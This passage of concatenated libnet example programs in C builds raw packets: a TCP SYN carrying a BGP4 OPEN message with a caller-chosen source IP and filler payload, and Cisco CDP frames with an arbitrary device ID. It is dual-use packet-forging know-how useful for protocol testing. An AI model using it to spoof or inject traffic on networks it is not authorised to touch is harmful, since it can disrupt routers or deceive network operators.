t = libnet_build_data(
values,
21,
l,
0);
if (t == -1)
{
fprintf(stderr, "Can't build CDP data: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_build_ethernet(
enet_dst, /* ethernet destination */
enet_src, /* ethernet source */
0x2000, /* protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte CDP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];
printf("libnet 1.1 packet shaping: BGP4 open + payload[raw]\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
while ((c = getopt(argc, argv, "d:s:t:m:p:S:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'm':
memcpy(marker, optarg, LIBNET_BGP4_MARKER_SIZE);
break;
case 'p':
payload = (u_char *)optarg;
break;
case 'S':
payload_s = atoi(optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
goto bad;
}
if (payload_s && !payload)
{
payload = (u_char *)malloc(payload_s);
if (!payload)
{
printf("memory allocation failed (%ld bytes requested)\n", payload_s);
goto bad;
}
memset(payload, 0x41, payload_s);
}
if (payload && !payload_s)
{
payload_s = strlen((char *)payload);
}
length = LIBNET_BGP4_OPEN_H + payload_s;
t = libnet_build_bgp4_open(
4, /* version */
0x3412, /* my AS */
0x7856, /* hold time */
0xefbeadde, /* BGP id */
payload_s, /* options length */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 open header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_BGP4_HEADER_H;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
LIBNET_BGP4_OPEN, /* message type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c, len, index;
libnet_t *l;
libnet_ptag_t t;
u_char *value;
u_char values[100];
u_short tmp;
char errbuf[LIBNET_ERRBUF_SIZE];
u_int8_t oui[3] = { 0x00, 0x00, 0x0c };
u_int8_t cdp_mac[6] = {0x01, 0x0, 0xc, 0xcc, 0xcc, 0xcc};
if (argc != 3)
{
fprintf(stderr, "usage %s device device-id\n", argv[0]);
return (EXIT_FAILURE);
}
fprintf(stderr, "cdppoke...\n");
l = libnet_init(LIBNET_LINK, argv[1], errbuf);
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
return (EXIT_FAILURE);
}
/* build the TLV's by hand until we get something better */
memset(values, 0, sizeof(values));
index = 0;
tmp = htons(LIBNET_CDP_VERSION);
memcpy(values, &tmp, 2);
index += 2;
tmp = htons(9); /* length of string below plus type and length fields */
memcpy(values + index, &tmp, 2);
index += 2;
memcpy(values + index, (u_char *)"1.1.1", 5);
index += 5;
/* this TLV is handled by the libnet builder */
value = argv[2];
len = strlen(argv[2]);
/* build CDP header */
t = libnet_build_cdp(
1, /* version */
30, /* time to live */
0x0, /* checksum */
0x1, /* type */
len, /* length */
value, /* value */
values, /* payload */
index, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build CDP header: %s\n", libnet_geterror(l));
goto bad;
}
/* build 802.2 header */
t = libnet_build_802_2snap(
LIBNET_SAP_SNAP, /* SAP SNAP code */
LIBNET_SAP_SNAP, /* SAP SNAP code */
0x03, /* control */
oui, /* OUI */
0x2000, /* upper layer protocol type */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build SNAP header: %s\n", libnet_geterror(l));
goto bad;
}
/* build 802.3 header */
t = libnet_build_802_3(
cdp_mac, /* ethernet destination */
(u_int8_t *)libnet_get_hwaddr(l), /* ethernet source */
LIBNET_802_2_H + LIBNET_802_2SNAP_H + LIBNET_CDP_H, /* packet len */
NULL, /* payload */
0, /* payload size */
l, /* libnet context */
0); /* libnet ptag */
if (t == -1)
{
fprintf(stderr, "Can't build 802.3 header: %s\n", libnet_geterror(l));
goto bad;
}
/* write the packet out */
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte CDP frame \"%s\"\n", c, argv[2]);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}